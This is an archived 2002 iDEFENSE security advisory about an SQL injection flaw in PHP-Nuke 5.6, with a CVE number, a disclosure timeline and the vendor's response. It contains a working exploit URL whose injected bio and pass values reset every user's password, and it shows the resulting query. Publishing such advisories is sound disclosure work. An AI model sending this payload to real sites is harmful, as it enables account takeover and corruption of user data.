OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: David Endler (dendler_at_idefense.com)
Date: Thu Oct 31 2002 - 20:26:21 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    iDEFENSE Security Advisory 10.31.02c:
    http://www.idefense.com/advisory/10.31.02c.txt
    PHP-Nuke SQL Injection Vulnerability
    October 31, 2002

    I. BACKGROUND

    "PHP-Nuke is a news automated system specially designed to be used in
    Intranets and Internet. The Administrator has total
    control of his web site, registered users, and he will have in the
    hand a powerful assembly of tools to maintain an active and 100%
    interactive web site using databases." More information is available
    at http://www.phpnuke.org.

    II. DESCRIPTION

    PHP-Nuke is susceptible to an SQL injection attack that allows an
    attacker to modify a user's table to his or her liking. It is
    possible for any registered user of the target system to launch this
    attack by feeding certain unfiltered characters to the account
    manager module. The attacker can target a specific user or all system
    users at once. The key is the ability to insert a backslash into the
    "bio" field, thereby escaping a quote and leaving the SQL query open
    for injection. The following example will modify every PHP-Nuke users
    password to "1.":

    Exploitation requires that the attacker log on, enter the account
    manager and determine his or her UID through the source of the page.
    If the attacker's UID is 2, he or she can then launch the attack by
    requesting the following URL:

    modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage=
    no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/*

    The injected query is constructed as follows:

    UPDATE nuke_users
       SET name = '',
           email = '',
           femail = '',
           url = 'http://',
           pass = 'xxxxx',
      +--[ bio = '\',
      | user_avatar = '',
      | user_icq = '',
      | user_occ = '',
      | user_from = '',
      | user_intrest = '',
      | user_sig = '',
      | user_aim = '',
      | user_yim = '',
      | user_msnm = '',
      +--[ newsletter = ',
           bio=0,pass=md5(1)/*' WHERE uid='2'

    The marked area is all treated as a value to store into bio. The
    "where" clause is commented out, leaving an update statement that
    updates the entire table (ie: all users) to having a password of
    MD5(1).

    III. ANALYSIS

    Exploitation allows an attacker to compromise any other system
    account, thereby gaining the privileges and identification of the
    compromised account. The attacker can also corrupt the entire user's
    table, effectively denying service to legitimate users.

    IV. DETECTION

    iDEFENSE Labs successfully tested and exploited this vulnerability in
    PHP-Nuke 5.6, Unix version. As the described exploit is dangerous in
    nature, administrators should not test in a production environment.

    V. VENDOR FIX

    The author, Francisco Burzi, responded:

    "PHP-Nuke version 6.0 is not vulnerable to the SQL injection
    attack...

    Latest version is 6.0 and 6.5 under development. Old versions doesn't
    have support of any kind, all bugs and security fixes apply in the
    new versions. So, the solution to this security hole is to update the
    software from 5.6 to 6.0 version."

    VI. CVE INFORMATION

    The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
    has assigned the identification number CAN-2002-1242 to this issue.

    VII. DISCLOSURE TIMELINE

    09/17/2002 Issue disclosed to iDEFENSE
    09/23/2002 Author notified through submission form
    09/23/2002 iDEFENSE clients notified
    10/01/2002 iDEFENSE second attempt at PHP-Nuke contact
    10/20/2002 iDEFENSE third attempt at PHP-Nuke contact
    10/31/2002 Response from Francisco Burzi
    (nukeliteusers.sourceforge.net)
    10/31/2002 Coordinated Public Disclosure

    VIII. CREDIT

    kill9 (kill9hackers.com) is credited with discovering this
    vulnerability.

    Get paid for security research
    http://www.idefense.com/contributor.html

    Subscribe to iDEFENSE Advisories:
    send email to listservidefense.com, subject line: "subscribe"

    About iDEFENSE:

    iDEFENSE is a global security intelligence company that proactively
    monitors sources throughout the world — from technical
    vulnerabilities and hacker profiling to the global spread of viruses
    and other malicious code. Our security intelligence services provide
    decision-makers, frontline security professionals and network
    administrators with timely access to actionable intelligence
    and decision support on cyber-related threats. For more information,
    visit http://www.idefense.com.

    - -dave

    David Endler, CISSP
    Director, Technical Intelligence
    iDEFENSE, Inc.
    14151 Newbrook Drive
    Suite 100
    Chantilly, VA 20151
    voice: 703-344-2632
    fax: 703-961-1071

    dendleridefense.com
    www.idefense.com

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 7.1.2
    Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

    iQA/AwUBPcHlgUrdNYRLCswqEQLGcwCdH27Ssm5+bhXyONfPn7uE+hk/gckAoOKJ
    IbcubmZUdFwWk9wRDlyT3kFj
    =FWej
    -----END PGP SIGNATURE-----